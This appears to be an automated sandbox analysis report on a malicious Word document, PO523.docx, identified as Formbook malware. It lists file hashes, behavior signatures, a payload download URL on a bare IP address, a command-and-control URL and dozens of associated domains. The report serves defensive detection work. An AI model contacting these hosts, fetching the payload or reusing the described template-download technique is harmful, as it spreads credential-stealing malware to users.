General
-
Target
PO523.docx
-
Size
10KB
-
Sample
210607-2mda12xg8a
-
MD5
e4afa614fdf22dbbbc6827eaae382588
-
SHA1
68169a695313e88ef1e8f55ece0652ec592c85f4
-
SHA256
e030587e4c5e9109c8e7647da36ffa7ba97b0ee1a1a1039ee7cb1f0927d3e14b
-
SHA512
47b7a48b530dff2b412db333a358c90627cb3a55de82ba576ab410f3bd4813616f1371e37037bda58ca061d1eddd3a0b30f79f4df3340e403ddc0ca21f7b258a
Static task
static1
Behavioral task
behavioral1
Sample
PO523.docx
Resource
win7v20210408
Behavioral task
behavioral2
Sample
PO523.docx
Resource
win10v20210410
Malware Config
Extracted
http://37.120.206.70/Mend/m.wbk
Extracted
formbook
4.1
http://www.girlsnightbag.com/dms/
commachic.com
accessremits.com
dopefight.com
awdinfo.com
nguyenanhnhat.com
mailposse.com
teachingpart-time.com
nurseryhost.com
creamstudiosmedellin.com
analisisproject.com
sanfranciscotraining.com
elitestatusconsulting.com
liguosucai.com
aterrior.com
estudiowoodpecker.com
float10x10.com
sbcforward.info
beyondthetrench.com
pavingllc.com
womensspecialcare.com
purpose-power-peace.com
garaurepresent.com
inekasphotography.com
classimusic.com
royalsupport18.com
feelbeautifulwithdee.co.uk
jbxdc.com
cad11.com
carweekoutlaws.com
portprive.email
modoo-cash.com
the-selfie-masters.com
insuranceneedsdmv.com
levanahjoyas.com
tn-adrc.com
dgbkny.com
fartifications.com
oguzfreze.com
malikman.com
fiestamexicanasalsa.com
shrinkedfact.com
flatnoseranch.com
midwestsolutions.net
putwild.xyz
ftlauderdaleaesthetics.com
losfundadoresreliquia.com
1835a.com
thefemalephilosopherartist.com
rrplun.com
dealbasis.com
monashishaland.com
walterlotz.com
dettagliperu.com
ispartareklamajansi.com
minemeapp.com
arbhost.info
theoptimistheart.com
alquilerautocaravanas.net
upclubmusic.com
jygraphics.com
thermalerosion.com
preipowealthbuilding.com
ownthelightbetweenoceans.com
nivxros.com
Targets
-
-
Target
PO523.docx
-
Size
10KB
-
MD5
e4afa614fdf22dbbbc6827eaae382588
-
SHA1
68169a695313e88ef1e8f55ece0652ec592c85f4
-
SHA256
e030587e4c5e9109c8e7647da36ffa7ba97b0ee1a1a1039ee7cb1f0927d3e14b
-
SHA512
47b7a48b530dff2b412db333a358c90627cb3a55de82ba576ab410f3bd4813616f1371e37037bda58ca061d1eddd3a0b30f79f4df3340e403ddc0ca21f7b258a
-
Formbook Payload
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Executes dropped EXE
-
Abuses OpenXML format to download file from external location
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Suspicious use of SetThreadContext
-